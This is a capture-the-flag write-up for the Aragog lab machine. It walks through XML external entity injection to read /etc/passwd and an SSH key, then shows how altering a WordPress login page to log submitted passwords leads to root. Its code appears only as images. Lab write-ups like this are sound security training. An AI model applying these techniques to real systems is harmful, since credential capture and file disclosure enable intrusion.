# Aragog ## Aragog - 10.10.10.78 ### Target Enumeration: OS: Linux IP: 10.10.10.78 User: f43bdfbcfd3f2a955a7b67c7a6e21359 Root: 9a9da52d7aad358699a96a5754595de6 ### Vulnerability Exploited: External Entity Injection to read passwd file and grab id\_rsa keys. ### Privilege Escalation: Root user logs into the application with plaintext credentials, modifying the wp-login.php page to dump passwords to disk reveals a root password. ### Exploiting the host: Nmap ![](https://lh4.googleusercontent.com/WKoL1EPUV8k9shpc_x_nYF9ty5XgftD10QkGjeosc0g01RB-cWMrvIM_lnCzfJ55ru9zKrruKIhMQgRCrE6Oh2oc8tWwKUqNglpV0fcNfRUNQfO_ESnwT4ReV4El1f4W7CePZWJn) Dirbuster ![](https://lh5.googleusercontent.com/Jw9dIlu80uKLcZVs93ZsC0bSsEKhDcS1rj9LY3nJgdDF5v_tls1TBZvkZxvzNFMsadtmkoVadVJrIEPVA2oj7hq4kqGL2WuqRqBCEvGPSgFwt8cdYZsMpBSn5iZTgD7M8S1tw5FV) Hosts.php ![](https://lh5.googleusercontent.com/wKQLEEutg_5CRFUcpZyJH4N3MuHjbOOp7hS2GhIDD-MX-6GVmUoYXF3wSpGNTH4_MQJobAmewI8h3g4oQSfWR2towlDG-SKgQB9qDinn2VLd_iTitUlIY3hHJGkdvuJ5_lcS16Xr) This is a strange request so build a post request to /hosts and test for external entity injection and you will find it is vulnerable to lfi
Found the user.txt ![](https://lh4.googleusercontent.com/_Pv7iuLCGJB1AKZP-O9w7o6gEVs10DAqik_mhb1OTb8Ka04KLr1CTVWUn2XCFgC1QJaNhk9srny1t_NKAkJjdnfIJMkV19WLPEetMaQU6pnMDqng9QMg7R62hwWp66d_VlemdL_5) F43bdfbcfd3f2a955a7b67c7a6e21359 Vulnerable code: ![](https://lh6.googleusercontent.com/8CLo3wJScq5tC6pZ7mz13KxmLKypV8OUUGGue2pkDoK436sIVxDBtm4D6uIZwY38y7YDibLke_xkcpfYZoDCoGWrx5LCn5pcEzG-At8rSu06__A9ViHlHzLLNsQ9yYuTUCKETAjj) Can't bruteforce ssh as it does not allow password authentication. Grab the ssh key file ![](https://lh5.googleusercontent.com/68-_pr86B-sHZbPuiq-TYCa8N0srHo602--6WywCGiIb5cN2iiBKF_VQVC2kmk46GCbzjCoyKVFAUUGK1DIOV96IjOea49ugzxmuspVNiIXU_pnwbNF0T6zNuAwITK9ucdHUbN7B) Download and chmod 400 the file and login via ssh as florian who we found in the /etc/passwd file. ![](https://lh5.googleusercontent.com/SjnTJYQQ38jk5MR7SiY6yxf_69fCl1MPs_nEVPn8tNBA-FWI5xvuHFG3U1IXA0E7S0u9pq4Esw63v58AbKQGdsVQ64oNKy8YsL_0lDu4Wa2NYFuwM_fG1DvEZU0vDaxurMuDgoZK) Bash history ![](https://lh4.googleusercontent.com/QWE2hCGVUWKivsdZFNi6q-HCM4DSO0o1dH7Q3eDUE52dUmQVJpqIzi5ueLD6GiZRLW7YRWwA8S2CByuwFudQioCOktvwW7AZsweykCCBAikvw8TbayEmcQOEseaDHkEv-mn0sKAy) Mysql history ![](https://lh6.googleusercontent.com/Fxw1sDcHQ01HP_atYz-ZrvTB6aG97D_pj0qbUumN562bbvQVBJVPEDSrinGdN0PpxtUa5LUJ8Ie0elitxkcHBfZ1nM1e_ihvFmedyFVaH_smfOO4A-g-I9NaAZboAbgtP6KVZAlW) Mysql password located in wp-config file ![](https://lh5.googleusercontent.com/0F5qrolAD10XX1k1ce_FYRjdVg9LNWoWKUvKLdF0kfOYafVYyCjIZKxDVepdCSkEa5yU3ABbXtYnHMVI6uJH9rrOzIK7k8x_l6zUSQsAvN7XAQloamoxeIYIb2nL2zr_1bQd-iZC) This password gives you access to the mysql database ![](https://lh3.googleusercontent.com/DwbKsZ0I2pODEFCjv9FTCFQAHg30c4bv7PIjNsjrnX7SYTXfIvqvyLqr-d8PdznT5aUc0Ofk2a_eYig_zYNNbW8eUEN2KGbLRIHIDFWNmU09jfUgETwy00POOE-gc-dNAKGVbRcM) Found admin hash ![](https://lh3.googleusercontent.com/Iu2Tlqf8qTGAPjmb-bFJdloywFfLTcaUX7-keerbQWq31YiDYhJdssJMog2qdfrf6l6UZYUvWl6Nhmt3NY5OXlG_i3wGs3TiicecvFPm-gbUQv4wM71LwiaJm4cxjR_Q4fk_ugn6) Also found a comment from cliff to florian: ![](https://lh3.googleusercontent.com/FPrWaAQS6fTmPU4gwhtB52RUf3WYbA0HfXyh8q8JPM_99VmJ-IJIjIrvlU6BKndMk0lv4RcwjkemKel-f2LDx5YFAWHpXhmfT2v8RJqNDfeCcI4-gW28Eov9c4jgpOrX5ckDqea0) Now we need to access the webpage so map it locally with ssh -L and access it (add 10.10.10.78 aragog to your hosts file). ![](https://lh6.googleusercontent.com/G97UurSPxlTCR2YSc-Fsa_hPzDSISmPp8OH4gSJd2HZC72wpfg0_0zUAiAf5NVQQkPjGRreRiah18mFHV2KXHSNObx0tlttVG5UvQOvli_uhu-6YybKHOfqXwd3MkIlv1_Phon7b) Now you can visit the wordpress application ![](https://lh6.googleusercontent.com/ljbZffGVmLxwx2BnmcEyagBaMzkBLGweDo7PLQo7wWarrSpB5n1qSB-ZXWMmR3u897Sk_vQkd2WT1tP_F6K2pLTO0f764BfBkLUpgqDD7FtS5J5dPOu85htPsHuGSCsA8nKTPR_w) We know from the database that the username is administrator so lets see if there are any wordpress exploits. WPscan doesn't bring anything back and ultimately there is no way into the application. Checking running processes every few seconds shows cliff running a python script called wp-login.py. ![](https://lh6.googleusercontent.com/JT8jKEPEzI3B1l8WPo7hgSArpcOOwRE696UOmFJKNEQbtwDBnMoVayFwpbxZzJSbsGc15F1hnrN29n4f0OsRS_zPnRd_IC0H2TEQsFo0Orz_5fTDROtAZ12mVnjjWQEYokE-Dlby) We can assume from this that he may be logging into the application. We can modify wp-login.php so add the following lines under the submit button. ![](https://lh6.googleusercontent.com/20xRARLZbcGat_hE8Ne_lO_Tnxjf-gLHT5PczqsOe68EurWhuuDODU4h5rHnVneb-r-gPD_KsX3WXoqmmDIAmmGU-gIyoA3ef9JPTfUMbl0phSA5lazOCkn4kJbHIIPeI0VEyTM_) Wait around 1 minute and you will see that loginData.txt has appeared in the /var/www/html dir Cat the file and you will have some credentials ![](https://lh5.googleusercontent.com/nQxjd9sH6BJg44hhFksj6oMLnefvKyzPQSzthC37QdUHWpoqLc1Ey3Gd7WL62Kapgwk58MpqBsIvNHaUoulCi_TCvh-cJ_pf7Lugal4HkakEkYhGPr6djN5m4YfoZ75l5CMt4SSU) Run su root to get a root shell with the password disclosed. ![](https://lh6.googleusercontent.com/VzJGlSAveo5PQiszQWyPyDGb77U2aPGg-ptGytprDR6r52He0dn06Ll24wVKO0TX5JO7iGNW4yVyi6k18dKmDLZnMYIsw3l6Ixb0CLpTP_FEqfWCW-qKJnVHFzThxOnXZnlQEzR1) Vulnerable programs/ scripts: ![](https://lh6.googleusercontent.com/tUVmYY_g5bKQDc7Xm-CUSdgi9xVVJCyJn69UTFGbkznZyHWR5b4YWWrU_zYHLM5FIDxWiP4PHWL0IwXlJsjLf7hqG8Nm7s3qUI60I1SH_kP4aj9mqbS6RH5qhYGbAsFUsbqZ8Pmk)